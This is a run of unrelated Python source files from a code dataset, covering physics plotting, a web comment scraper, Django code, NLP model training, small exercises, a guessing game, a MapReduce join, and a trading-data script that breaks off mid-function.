'Combined_Rates', 'Shot = '+str(shot))\n#r_min = cd.get_value('r_min')\n#r_max = cd.get_value('r_max')\n\n#shot = cd.get_value('shot', int)\n\nchannels = []\n# assemble the information\n# orbit view data and rate data MUST match\n\nfor i, v_d in enumerate(view_names):\n # loop over directories\n v_f = view_dir + '/' + v_d + '/' #mymod Alex\n # get the magnetic axis data\n rm,zm = get_magnetic_axis( v_f + 'orbit_output') \n ch = []\n for j, n in enumerate(v_chan[i]):\n n += 1\n # loop over detectors in views\n patt = 'track_{0:1d}????.data'.format(n)\n view_patt = v_f + patt\n print(view_patt)\n view_f = G.glob(view_patt)\n print(view_f)\n # contains all tracks for a given detector\n view_files.append(view_f)\n mag_axis.append((rm,zm))\n vdd = B.get_file(view_f[0])\n cc = vdd.par.get_value('channel_number',int)\n ch.append(cc)\n channels.append(ch)\n\n\n# map views and channels\nall_views = []\nfor i, vf in enumerate(view_files):\n print('loading detecgtor : ', v_chan_f[i], ' from : '+P.split(vf[0])[0])\n views = []\n for f in vf:\n # print ' getting view : ', f\n views.append(vd.view(f))\n all_views.append(views)\n\n\n# get stored channel information\n\nxv = np.arange(len(views))\n\n\n# get zero crossings\nR_mid = []\nfor views in all_views:\n R0 = np.array([ get_zero_crossing(v) for v in views ])\n R_mid.append([R0.mean(), np.sqrt(R0.var())])\nR_mid = np.array(R_mid)\n\n# reshape array, assumes that all views have the same number of channels\nR0a = R_mid[:,0].reshape(len(view_names), len(v_chan[0]))\nsig_R0a = R_mid[:,1].reshape(len(view_names), len(v_chan[0]))\n\ntimes = get_times(view_names) \n\n# plot the radii\n\n# midplane intersection for detectors\nr1 = R0a[:,0]\nr2 = R0a[:,1]\nr3 = R0a[:,2]\nr4 = R0a[:,3]\nr5 = R0a[:,4]\nr6 = R0a[:,5]\n\ndr1 = sig_R0a[:,0]\ndr2 = sig_R0a[:,1]\ndr3 = sig_R0a[:,2]\ndr4 = sig_R0a[:,3]\ndr5 = sig_R0a[:,4]\ndr6 = sig_R0a[:,5]\n\n# range in R covered (2 sigma)\n\nB.plot_exp(times, r1, dr1, color = 'r' , label = 'view 1, ch {}'.format(channels[0][0]))\nB.plot_exp(times, r2, dr2, color = 'g', label = 'view 2, ch {}'.format(channels[0][1]))\nB.plot_exp(times, r3, dr3, color = 'b', label = 'view 3, ch {}'.format(channels[0][2]))\nB.plot_exp(times, r4, dr4, color = 'y', label = 'view 4, ch {}'.format(channels[0][3]))\nB.plot_exp(times, r5, dr5, color = 'm', label = 'view 5, ch {}'.format(channels[0][4]))\nB.plot_exp(times, r6, dr6, color = 'c', label = 'view 6, ch {}'.format(channels[0][5]))\n\nB.pl.xlabel('time (s)')\nB.pl.ylabel('R mid-plane (m)')\nB.pl.ylim((r_min, r_max))\nB.pl.title('Mid-Plane radii for {}'.format(shot))\n\nB.pl.legend(loc = 'upper right')\n\nB.pl.show()\n\n# save the radii in a file, they can be used for plotting\nfile_name = res_dir + 'orbit_mean_rad_mid_plane_{}.data'.format(shot)\nif not os.path.exists(os.path.dirname(file_name)):\n os.makedirs(os.path.dirname(file_name))\nif os.path.isfile(file_name):\n inp = input(\"Do you want to overwrite the results file? (y)es or (n)o: \") \n if inp == \"yes\" or inp == \"y\": \n os.remove(file_name)\n print('Old file removed.')\no = open(file_name,'w')\no.write('# mean mid-plane intersections for a range of times\\n')\no.write('#! t[f,0]/ r0[f,1]/ r1[f,2]/ r2[f,3]/ r3[f,4]/ r4[f,5]/ r5[f,6]/ ch0[f,5]/ ch1[f,6]/ ch2[f,7]/ ch3[f,8]/ ch4[f,9]/ ch5[f,10]/ \\n')\n\nfor i,tt in enumerate(times):\n print(\"writing time : \", tt, i)\n cc = channels[i]\n o.write('{} {} {} {} {} {} {} {} {} {} {} {} {}\\n'.format(tt, \\\n r1[i], \\\n r2[i], \\\n r3[i], \\\n r4[i], \\\n r5[i], \\\n r6[i], \\\n cc[0], cc[1], cc[2], cc[3], cc[4], cc[5] )) #dr1[i]\n# done\no.close()\n","sub_path":"analysis_modules/archive_old/orbit_get_mean_radii_par.py","file_name":"orbit_get_mean_radii_par.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"181411558","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\n\n\ndef dbmoviecomment():\n for n in list(range(20 ,4000 ,20)):\n url = 'https://movie.douban.com/subject/1578714/comments?start=' + str(n) + '&limit=20&sort=new_score&status=P'\n html = requests.get(url).content\n html = bs(html ,'html.parser')\n div = html.find_all(name = 'div' ,attrs = {'class' :'comment'})\n for x in div:\n p = x.find_all(name = 'p')\n for y in p:\n with open('special woman.txt' , 'ab+') as file:\n file.write(y.get_text().encode())\n # 爬取豆瓣影评,神奇女侠","sub_path":"pynote/example/dbcomment.py","file_name":"dbcomment.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"40219234","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('conferenceR', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='conferenceregistration',\n name='visa_arrival',\n field=models.IntegerField(default=0, choices=[(1, b'Yes'), (0, b'No')]),\n ),\n ]\n","sub_path":"conferenceR/migrations/0002_conferenceregistration_visa_arrival.py","file_name":"0002_conferenceregistration_visa_arrival.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"83527055","text":"# Author: Sumedh Chandaluri\n# 206021\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom sklearn.model_selection import GridSearchCV, train_test_split, validation_curve\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\n\nfrom nltk.stem import PorterStemmer\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport pickle\n\n\nclass SPi_basic_nlp:\n\n def __init__(self, df, text_col, class_col, max_features, n_gram, name, path):\n \n \"\"\" self, represents the instance of the class.\n \n Here by creating an object, you can have train-test-split, then create a count vectorizer and \n fit_transform on train set & transform on test set. After that we save count vectorizer object for tranforming on test query also\n \n Inputs\n 1. DataFrame\n 2. Text Column Name\n 3. Class Label Column Name\n 4. max_features to be used for count_vectorizer (sklearn)\n 5. n-grams to be used for count_vectorizer (sklearn)\n 6. each type of 'strtaxonomy'(a column in df)\n eg: We have 3 different types of 'strtaxonomy'\n a) for 'patient problem code', keep name = 'patient'\n b) for 'device problem code', keep name = 'device'\n c) for 'medical evaluation result code', keep name = 'medical'\n 7. path where we save all our \n a) count_vectorizer object for each 'strtaxonomy'\n b) model for each 'strtaxonomy'\n \"\"\"\n \n self.df = df\n self.text_col = text_col\n self.class_col = class_col\n self.max_features = max_features\n self.name = name\n self.path = path\n self.ngram = n_gram\n X_train_df, X_test_df, self.y_train, self.y_test = train_test_split(df[text_col], df[class_col], test_size=0.1, random_state=93)\n with open('stopwords_2.pickle', 'rb') as handle:\n stopwords = pickle.load(handle)\n \n # count_vec = CountVectorizer(ngram_range=(1, n_gram), binary=True, max_features=max_features, stop_words=stopwords)\n # self.X_train = count_vec.fit_transform(X_train_df)\n # self.X_test = count_vec.transform(X_test_df) \n # with open(self.path + 'count_vectorizer_' + self.name + '.pickle', 'wb') as handle:\n # pickle.dump(count_vec, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n tfidf_vec = TfidfVectorizer(ngram_range=(1, n_gram), binary=True, max_features=max_features, stop_words=stopwords)\n self.X_train = tfidf_vec.fit_transform(X_train_df)\n self.X_test = tfidf_vec.transform(X_test_df)\n with open(self.path + 'tfidf_vectorizer_' + self.name + '.pickle', 'wb') as handle:\n pickle.dump(tfidf_vec, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n @classmethod\n def basic_preprocessing(cls, df, text_cols):\n \n \"\"\" Basic Pre-Processings like\n 1. Making all given text columns into lower\n 2. Removing spcaes/new line at the end of the text\n eg: a) 'cats ' to 'cats'\n b) 'dogs\\n' to 'dogs'\n 3. Reseting Index\n \n Inputs\n 1. DataFrame\n 2. All the columns (list of strings/column names) where text is present and want to remove spaces/new line at the end.\n \n Output\n 1. Pre-processed DataFrame\n \"\"\"\n\n for col in text_cols:\n df[col] = df[col].str.lower()\n df[col] = df[col].str.rstrip()\n \n df.drop_duplicates(inplace=True)\n df.reset_index(drop=True, inplace=True)\n \n return df\n \n @classmethod\n def stemming_sentence(cls, sentence):\n \n \"\"\" Given a string, it converts each word into it's root word and returns a stemmed string.\n You have to use below code to apply on the whole column of a DataFrame:\n \n 'df[column name] = df[column name].apply(SPi_basic_nlp.stemming_sentence)'\n \n Input:\n 1. string\n Output:\n 1. string\n \"\"\"\n porter_stemmer = PorterStemmer()\n tokens = sentence.split()\n stemmed_tokens = [porter_stemmer.stem(token) for token in tokens]\n \n return ' '.join(stemmed_tokens)\n \n @classmethod \n def plural_to_singular(cls, content):\n \n ''' Given a string, it converts each plural word into it's singular form and returns a string.\n You have to use below code to apply on the whole column of a DataFrame:\n \n 'df[column name] = df[column name].apply(SPi_basic_nlp.plural_to_singular)'\n \n Inputs:\n content: string \n Returns:\n content: plurals in the string (content) made to singular\n '''\n blob = TextBlob(content)\n singles = [word.singularize() for word in blob.words] # plural to singular\n \n return ' '.join(singles)\n\n @classmethod\n def after_preprocessings(cls, df, str_1, top):\n \n \"\"\" Making the data feedable to create a Model\n 1. Calculating top 'n' most occuring class labels and making all other variables as 'others'((n+1)th class)\n 2. Returns a DataFrame\n \n Inputs\n 1. DataFrame\n 2. type of DataFrame\n 3. 'n' most occuring class labels\n \n Output\n 1. DataFrame making remaining labels as 'others'\n \"\"\"\n \n new = df[df['strtaxonomy'] == str_1]['strNode'].value_counts().rename_axis('strNode').reset_index(name='count')\n new = new.head(top)\n class_1 = list(new['strNode'])\n\n df_class_1 = pd.DataFrame()\n for i in class_1:\n temp = df[df['strNode'] == i]\n df_class_1 = df_class_1.append(temp)\n\n merge = pd.merge(df_class_1, df[df['strtaxonomy'] == str_1], on=list(df.columns), how='outer', indicator=True)\n others_class_1 = merge[merge['_merge'] == 'right_only']\n others_class_1['strNode'] = 'others'\n final_class_1 = pd.DataFrame()\n final_class_1 = final_class_1.append(merge[merge['_merge'] == 'both'])\n final_class_1 = final_class_1.append(others_class_1)\n \n del final_class_1['_merge']\n \n return final_class_1\n\n \n def logistic_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on Logistic Regression and saves hyperparameter tuned model of Logistic Regression.\n Hyperparameter tuning 'C', 'penality'.\n \n Input\n 1. list of various numbers for Hyperparameter 'C'\n \n Output\n 1. No Returns, only saves the best model of Logistic Regression in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'C': param_range, 'penalty':['l1','l2']}]\n model = GridSearchCV(LogisticRegression(class_weight='balanced', random_state=93, multi_class='auto'), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'logistic_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def sgd_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on SGD Classifier and saves hyperparameter tuned model of SGD Classifier.\n Hyperparameter tuning 'alpha', 'penality'.\n \n Input\n 1. list of various numbers for Hyperparameter 'alpha'.\n \n Output\n 1. No Returns, only saves the best model of SGD Classifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'alpha': param_range, 'penalty':['l1','l2']}]\n model = GridSearchCV(SGDClassifier(class_weight='balanced', random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'sgd_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def rfdt_multiclass_model(self, param_range):\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on RandomForestClassifier and saves hyperparameter tuned model of RandomForestClassifier.\n Hyperparameter tuning 'alpha', 'penality'.\n \n Input\n 1. list of various numbers for Hyperparameter 'n_estimators'.\n \n Output\n 1. No Returns, only saves the best model of RandomForestClassifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'n_estimators': param_range}]\n model = GridSearchCV(RandomForestClassifier(class_weight='balanced', random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'rfdt_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n\n def gbdt_multiclass_model(self, param_range): # work in progress\n \n \"\"\" self, represents the instance of the class.\n \n Hyperparameter Tuning using GridSearchCV (3-Cross Validation) on GradientBoostingClassifier and saves hyperparameter tuned model of GradientBoostingClassifier.\n Hyperparameter tuning 'alpha', 'penality'.\n \n Input\n 1. list of various numbers for Hyperparameter 'n_estimators'.\n \n Output\n 1. No Returns, only saves the best model of GradientBoostingClassifier in self.path\n \n \n Note: Before you call this function create an object and then call this function\n \"\"\"\n\n tuned_parameters = [{'n_estimators': param_range}]\n model = GridSearchCV(GradientBoostingClassifier(random_state=93), tuned_parameters, scoring='f1_micro', cv=3)\n model.fit(self.X_train, self.y_train)\n pred = model.predict(self.X_test)\n print(model.best_estimator_)\n print(model.score(self.X_test, self.y_test))\n print('\\n\\n')\n \n filename = 'gbdt_' + str(self.name) + '.sav'\n pickle.dump(model, open(self.path + filename, 'wb'))\n \n \n def train_test_plot(self, param_range, param_name):\n \n \"\"\" self, represents the instance of the class.\n \n Train-Test Plot \n \n Input\n 1. param_range \n i.e. for hyperparameter 'C' in LR.\n for hyperparameter 'alpha' in SGD.\n \n Output\n 1. No returns, Plots the Train-Test f1_micro plots and also prints Train-Test f1 scores for each Hyperparameter i.e. either 'C' or 'alpha'.\n \"\"\"\n \n train_scores, test_scores = validation_curve(LogisticRegression(class_weight='balanced', random_state=93, multi_class='multinomial'), self.X_train, self.y_train, \n param_name=param_name, param_range=param_range, scoring='f1_micro', cv=3, n_jobs=1)\n \n train_scores_mean = np.mean(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n plt.plot(param_range, train_scores_mean, label = \"Training Score\")\n plt.plot(param_range, test_scores_mean, label = \"Test Score\")\n plt.grid()\n plt.title(\"Train-Test Scores Curve for LR with varying '{}' \".format(param_name))\n plt.xlabel(\"Varying \" + param_name + \" ----->\")\n plt.ylabel(\"f1_micro Scores ----->\")\n plt.legend()\n plt.show()\n print(train_scores_mean)\n print(test_scores_mean)\n print('\\n\\n')\n \n \n def train_model_scores(self, model_type):\n \n \"\"\" self, represents the instance of the class.\n \n Print Train Scores, i.e. calculating \n 1. Precision\n 2. Recall\n 3. F1 Micro Score\n \n Using Direct functions of sklearn.\n \"\"\"\n \n loaded_model = pickle.load(open(self.path + str(model_type) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(self.X_train)\n pre_score = precision_score(self.y_train, pred, average=None, pos_label=1, sample_weight=None)\n recall = recall_score(self.y_train, pred, average=None)\n f1 = f1_score(self.y_train, pred, average=None)\n print('Train Scores')\n print('Precision =' ,pre_score)\n print('Recall =' ,recall)\n print('F1 Score =' ,f1)\n print('\\n\\n')\n \n \n def test_model_scores(self, model_type):\n \n \"\"\" self, represents the instance of the class.\n \n Print Test Scores, i.e. calculating \n 1. Precision\n 2. Recall\n 3. F1 Micro Score\n \n Using Direct functions of sklearn.\n \"\"\"\n \n loaded_model = pickle.load(open(self.path + str(model_type) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(self.X_test)\n pre_score = precision_score(self.y_test, pred, average=None, pos_label=1, sample_weight=None)\n recall = recall_score(self.y_test, pred, average=None)\n f1 = f1_score(self.y_test, pred, average=None)\n print('Test Scores')\n print('Precision =' ,pre_score)\n print('Recall =' ,recall)\n print('F1 Score =' ,f1)\n print('\\n\\n')\n \n\n def query_predict(self, df, model_name):\n \n \"\"\" self, represents the instance of the class.\n \n Predicting the class label of a New Query given its tokenizer and Model \n \n Inputs\n 1. Basic Pre-processed DataFrame\n 2. model_name\n eg: For Logistic Regression, model_name = 'logistic'\n For SGDClassofoer, model_name = 'sgd'\n \n Outputs\n 1. DataFrame with predicted label \n \"\"\"\n \n with open(self.path + 'tfidf_vectorizer_' + self.name + '.pickle', 'rb') as handle:\n count_vec = pickle.load(handle)\n \n X_test = count_vec.transform(df['FOI_TEXT_TRIM'])\n loaded_model = pickle.load(open(self.path + str(model_name) + '_' + self.name + '.sav', 'rb'))\n pred = loaded_model.predict(X_test)\n df['pred'] = pred\n \n return df","sub_path":"spinlp/python 2/functions_2.py","file_name":"functions_2.py","file_ext":"py","file_size_in_byte":15824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147110232","text":"def binary(n):\n s=[]\n while n:\n s.append(n%2)\n n >>= 1\n s=s[::-1]\n b = ''.join([chr(i+48) for i in s])\n return b\n \ndef maxOnes(n):\n sbin = binary(n)\n val = 0\n counter = 0\n for c in sbin:\n counter = counter + 1 if c == '1' else 0\n val = max(val, counter)\n return val\n","sub_path":"strings/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"246078833","text":"from simulated_environment import RuntimeMatrixEnvironment\nfrom impatient import ImpatientCapsAndRuns\nimport capsandruns as capsandruns\n\nimport numpy as np\n\nimport pickle\n\n# Use WORK_STEP = 10\n\n# only_car, baseline_mode, gbc\nconfigs = [\n (False, False, True),\n (False, False, False),\n (True, True, True),\n (True, False, True)\n]\n\nall_total_runtimes = []\n\ndelta = 0.1\n\nfor seed in range(5):\n for gamma in [0.05, 0.02, 0.01]:\n # Adaptive K\n max_k = int(np.ceil(np.log(0.5/gamma) / np.log(2)))\n print(max_k)\n for only_car, baseline_mode, guessbestconf in configs:\n print(gamma)\n settings = {\n 'epsilon': 0.05,\n 'delta': delta,\n 'gamma': gamma,\n 'max_k': max_k,\n 'zeta': 0.05,\n 'only_car': only_car,\n 'baseline_mode': baseline_mode,\n 'guessbestconf': guessbestconf,\n 'seed': 520 + seed\n }\n env = RuntimeMatrixEnvironment('./dataset/cplex_region/cplex_region_rt_seed{}.npy'.format(520+seed))\n icar = ImpatientCapsAndRuns(env=env, **settings)\n ret = icar.run()\n all_total_runtimes.append((settings,\n icar.final_precheck_accepted, \n icar.final_precheck_examined,\n icar.env.total_runtime, \n capsandruns.format_runtime(icar.env.total_runtime),\n ret))\n print('global_t: {}'.format(icar.global_t))\n print(all_total_runtimes)\n\n with open('region/region_a_rsf_epsilon{}_delta{}_gamma{}_car{}_baseline{}_gbc{}_seed{}.dump'.format(settings['epsilon'],delta,gamma, only_car, baseline_mode, guessbestconf, 520+seed), 'wb') as f:\n pickle.dump(icar.env.run_so_far, f)\n with open('region/region_a_rt_delta{}.dump'.format(delta), 'wb') as f:\n pickle.dump(all_total_runtimes, f)\nprint(\"Done\")\n","sub_path":"region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"479205229","text":"from django.conf.urls import url\nfrom ad_categories.views import *\n\n\nurlpatterns = [\n url(r'^$', AdCategoriesView.as_view(), name='ad_categories'),\n\n url(r'^(?P[\\w\\-]+)/$', AdCategoryView.as_view(), name='ad_category'),\n url(r'^region_(?P[\\w\\-]+)/(?P[\\w\\-]+)/$', AdRegionCategoryView.as_view(), name='ad_category_region'),\n url(r'^sity_(?P[\\w\\-]+)/(?P[\\w\\-]+)/$', AdCityCategoryView.as_view(), name='ad_category_city'),\n\n url(r'^subcat/(?P[\\w\\-]+)/$', AdSubCategoryView.as_view(), name='ad_subcategory'),\n url(r'^reg_(?P[\\w\\-]+)/name_(?P[\\w\\-]+)/$', AdRegionSubCategoryView.as_view(), name='ad_subcategory_region'),\n url(r'^(?P[\\w\\-]+)/sub_(?P[\\w\\-]+)/$', AdCitySubCategoryView.as_view(), name='ad_subcategory_city')\n]\n","sub_path":"ad_categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341707492","text":"dicio={\"Santiago\":(\"Nuno\",\"laco\"),\"Nuno\":(\"Maria\",\"sapatos\"),\"Maria\":(\"Santiago\",\"cartas\"),\"Carlos\":(\"Pedro\",\"lata\")}\r\n\r\ndef secret_friend(dicio):\r\n for key1,value1 in dicio.items():\r\n count1=0\r\n count2=0\r\n for key2,value2 in dicio.items():\r\n if key1 == value2[0]:\r\n count1 += 1\r\n if value1[0]==key2:\r\n count2 += 1\r\n if count1==0:\r\n print(key1,\"não recebe prenda\")\r\n if count2==0:\r\n print(value1[0],\"não dá\")\r\n return \"\"\r\n\r\n\r\n\r\nprint(secret_friend(dicio))\r\n\r\n","sub_path":"Cap6/Cap6_exos_ficha/Ex 3..py","file_name":"Ex 3..py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"85136105","text":"import numpy as np\nn = int(input('Количество элементов в массиве: '))\nA = np.zeros(n, dtype = np.int_)\nfor j in range(n):\n A[j] = int(input('Вводите элменты массива: '))\nprint(\"ваш массив: \", A)\nN = len(A)\ni = 0\nflag = True\nwhile flag:\n flag = False\n for j in range(N-i-1):\n if (A[j] > A[j+1]):\n tmp = A[j]\n A[j] = A[j+1]\n A[j + 1] = tmp\n flag = True\n i+=1\n print(A)\n\nimport numpy as np\nb = int(input(\"введите кол во элиментов в массиве\"))\na = np.zeros(b , dtype = int)\nfor i in range(b):\n a[i] = int(input(\"Заполните матрицу\"))\nprint (a)\nm=len(a)-1\nwhile m>0:\n for i in range(m):\n if (a[i]>a[i+1]):\n a[i], a[i-1] = a[i-1], a[i]\n m -= 1\n print(a)","sub_path":"laba 4/bubble sort.py","file_name":"bubble sort.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"115886333","text":"#-*- coding:utf-8 -*-\n__author__ = 'LIPENGFEI006'\nfrom common.getconfig import GetConfig\nfrom common.verify import Verify\nfrom common.md5sum import getmd5sum\nfrom nose.plugins.attrib import attr\nfrom common.requestslib import RequestsLib\n\n@attr('cityarea','hhub3')\nclass TestCityArea():\n @classmethod\n def setup_class(self):\n self.conf = GetConfig()\n self.verity=Verify()\n self.url \\\n = self.conf.get_conf_value(\"hhub3\",\"url\")+r\"api/City/CityArea\"\n self.requestslib = RequestsLib()\n\n @classmethod\n def teardown_class(self):\n pass\n\n def TestCityArea_status(self):\n u'获取城市以下的地铁,机场,地标(商圈),火车站。国内外通用。AreaType对应关系见文旦模型描述'\n\n params = dict()\n params['CityID'] = '3104'\n response = self.requestslib.send_request_by_alltoken('get', self.url, request_body=params)\n #获取状态码\n self.verity.by_status(response, 200)\n\n\n\n\n\n","sub_path":"testproject/hhub3/city/cityarea/testcityarea.py","file_name":"testcityarea.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"464430422","text":"import random\nfrom tkinter import *\nfrom tkinter import messagebox\n\ncount_guess = 1\nguessed = int(random.randint(1, 100))\nMAX_GUESSED = 100\n\n\nclass Game:\n def __init__(self, count_guess, guessed):\n self.count_guess = count_guess\n self.guessed = guessed\n # GUI Window game\n self.root = Tk()\n self.frame = Frame(self.root).pack()\n self.root.wm_title(\"GUESS ME!\")\n self.root.geometry(\"450x200\")\n Label(self.root, text=\"WELCOME TO GUESS ME!\", font=\"yellow\").pack()\n Label(self.root, text=\"you need to guess number between 1 to 100\", font=\"yellow\").pack()\n Label(self.root, text=\"if your guess is too high, you get 'too high'\", font=\"yellow\").pack()\n Label(self.root, text=\"if your guess is too low, you get 'too low'\", font=\"yellow\").pack()\n Label(self.root, text=\"LEST GO!\", font=\"yellow\")\n\n self.entrytext = StringVar()\n self.entry = Entry(self.root, textvariable=self.entrytext)\n self.entry.pack()\n\n self.buttontext = StringVar()\n self.buttontext.set(\"Push Me!\")\n self.button = Button(self.root, textvariable=self.buttontext, command=self.clicked1).pack()\n\n self.label = Label(self.root, text=\"\")\n self.label.pack()\n\n self.root.mainloop()\n\n def new_game(self):\n self.entry.delete(0, 20)\n self.guessed = int(random.randint(1, 100))\n self.count_guess = 0\n self.label.configure(text=\"NEW GAME!\", font='yellow')\n\n def clicked1(self):\n try:\n guess = int(self.entrytext.get())\n if guess == self.guessed:\n self.label.configure(text=\"CONGRATULATIONS, YOU GUESSED IT RIGHT!!\", font='yellow')\n answer = messagebox.askquestion(\"Guess Me Game!\", f\"CONGRATULATIONS, YOU WIN after {self.count_guess} guesses!!!!!, do you want another game?\")\n if answer.lower() == \"yes\":\n self.new_game()\n else:\n quit()\n elif guess > MAX_GUESSED:\n self.label.configure(text=\"your guess is to high!\\n please try number between 1 to 100\", font='yellow')\n elif guess > self.guessed:\n self.label.configure(text=f\"your number: {guess} is Too High, please try again\", font='yellow')\n else:\n self.label.configure(text=f\"your number: {guess} is Too Low, please try again\", font='yellow')\n self.count_guess += 1\n except ValueError:\n self.label.configure(text=\"you d'osnt insert a number!\\n please try guess number between 1 to 100\", font='yellow')\n\n\nGame(count_guess, guessed)\n","sub_path":"games/GuessMeGameWithGui.py","file_name":"GuessMeGameWithGui.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"649785629","text":"class Solution:\n def printTree(self, root):\n \n def height(root):\n if not root:\n return 0\n lh = height(root.left)\n rh = height(root.right)\n return max(lh + 1, rh + 1)\n \n h = height(root)\n self.matrix = [[\"\"] * (2**h - 1) for _ in range(h)]\n \n def tranverse(root, level, pos):\n if not root:\n return\n \n pad = 2**(h-level-1) - 1\n space = 2**(h-level) - 1\n \n index = pad + (space + 1) * pos\n self.matrix[level][index] = str(root.val)\n tranverse(root.left, level + 1, pos << 1)\n tranverse(root.right, level + 1, (pos << 1) + 1)\n \n tranverse(root, 0, 0)\n return self.matrix\n \n","sub_path":"python/655 Print Binary Tree.py","file_name":"655 Print Binary Tree.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"628061639","text":"import MapReduce\nimport sys\nimport itertools\n\"\"\"\nMapReduce program to join two tables \n\"\"\"\n\nmr = MapReduce.MapReduce()\n\ndef mapper(record):\n\trelationName=record[0]\n\tif relationName=='MovieNames':\n\t\tkey=record[2]\n\t\tdel record[0]\n\t\tnewValue=('MovieNames',record)\n\telif relationName=='MovieRatings':\n\t\tkey=record[1]\n\t\tdel record[0]\n\t\tnewValue=('MovieRatings',record)\n\tmr.emit_intermediate(key,newValue)\n\ndef reducer(key, list_of_values):\n\tfor value in list_of_values:\n\t\tif value[0]=='MovieNames':\n\t\t\toutput=value[1]\n\t\t\torgOutput=list(output)\n\tavg=0.0\n\tcount=0\n\tfor value in list_of_values:\n\t\tif value[0]=='MovieRatings':\n\t\t\tcount=count+1\n\t\t\tavg=avg+value[1][2]\n\t\t\toutput+=value[1]\n\t\t\tmr.emit(output)\n\t\t\toutput=orgOutput\n\tmr.emit((orgOutput[0],avg/count))\n\t\t\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"MapReduce/relational_join.py","file_name":"relational_join.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"606279981","text":"import time\nimport datetime\nimport numpy as np\nimport pandas as pd\nfrom ib_insync import *\n\nimport time\nimport bokeh\nbokeh.sampledata.download()\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.layouts import gridplot\nfrom bokeh.sampledata.stocks import MSFT\nfrom bokeh.models import HoverTool\nfrom math import pi\n\ndef Ibconnect(): # 检查网络链接\n for i in range(0, 30, 1):\n try:\n b = ib.connect('127.0.0.1', 7497, clientId=i, timeout=0.2) # # 超时0.2秒,目的是连接不成功快速进行下一次尝试\n # print(b)\n except:\n print('尝试联网失败:clientId=%s' % (i))\n else: # 联网成功\n # time.sleep(0.3) # 等待测试连接超时,然后重新连接\n for j in range(i + 1, 30, 1): # 重新建立一个连接\n try:\n b = ib.connect('127.0.0.1', 7497, clientId=i, timeout=0) # 由于测试连接0.2秒太短,需要重新设置连接超时时间保证后面的程序可以正常连接\n except:\n print('尝试联网失败:clientId=%s' % (i))\n\n else:\n print('联网成功:clientId=%s' % (j))\n return True\ndef Get_Data(contract, dur, barsize, endTime):\n 